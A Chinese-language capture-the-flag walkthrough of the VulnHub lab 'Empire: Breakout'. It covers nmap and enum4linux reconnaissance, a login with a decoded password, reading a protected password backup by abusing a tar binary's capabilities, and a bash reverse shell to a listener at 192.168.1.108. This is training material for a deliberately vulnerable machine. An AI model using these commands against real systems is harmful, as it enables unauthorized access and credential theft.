vulnhub-EMPIRE: BREAKOUT

Empire: Breakout ~ VulnHub

靶机：EMPIRE: BREAKOUT

 

攻击机：

kali linux

Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux

信息收集

nmap 192.168.1.1/24

nmap -sS -sV -A -p- 192.168.1.107

 访问一下80端口

 在页面源码的最底部发现了加密字符串。

这个文件很像上一篇文章里的加密。这里就不在赘述解密过程。

解密后：

.2uqPEfj3D 
  
看起来像是密码。暂时先放下。看看其他两个端口。
 
  
https://192.168.1.107:10000/
 
  
 
  
https://192.168.1.107:20000/
 
  
 
  
这两端口都是登陆界面。
 
  
暂时没有思路。刚才只是拿到了密码。
 
  
再仔细看namp的扫描结果，看到目标主机开通了445 139端口的smb服务。
 
  
 
  
 这里引入SMB利用命令：enum4linux。
 
  
enum4linux 192.168.1.107
 
  
 
  
 
  
发现了一个本地用户：cyber。
 
  
再拿之前解密的类似密码的字符串去登陆两个登陆界面。
 
  
 
  
20000端口的登陆成功。
 
  
 
  
然后，大家仔细看这里。这不是命令行的标志吗。
 
  
 
  
点开还真是。
 
  
那直接可以执行命令了。
 
  
开始收集命令：
 
  
 
  
 
  
 
  
 
  
这个又类似于一个密码。
 
  
再看一下那个可运行的tar文件，这里引入getcap命令。
 
  
查看一下。
 
  
 
  
貌似是任意读取文件的权限。
 
  
 
  
然后再大佬的指示下，找到了一个可疑文件，貌似是密码备份。但是普通用户没权限打开。这里就用到刚才的tar文件。
 
  
./tar -zcf pass.tar /var/backups/.old_pass.bak
 
  
 
  
 
 
  
再解压一下：
 
  
./tar -xvf passwd.tar
 
  
 
  
 
 
  
看到这个文件就成功了。
 
  
 
  
好像又是一个密码。
 
  
这里我们还需要反弹shell。
 
  
 
  
开启监听。开始执行shell。
 
  
bash -i >& /dev/tcp/192.168.1.108/4321 0>&1
 
  
 
 
  
成功弹出shell。
 
  
 
  
成功提权root。
 
  
 
  
这里是rOOt，刚开始我看成r00t。
 
  
这道题算是比较简单的了。知识点是新学习了getcap命令。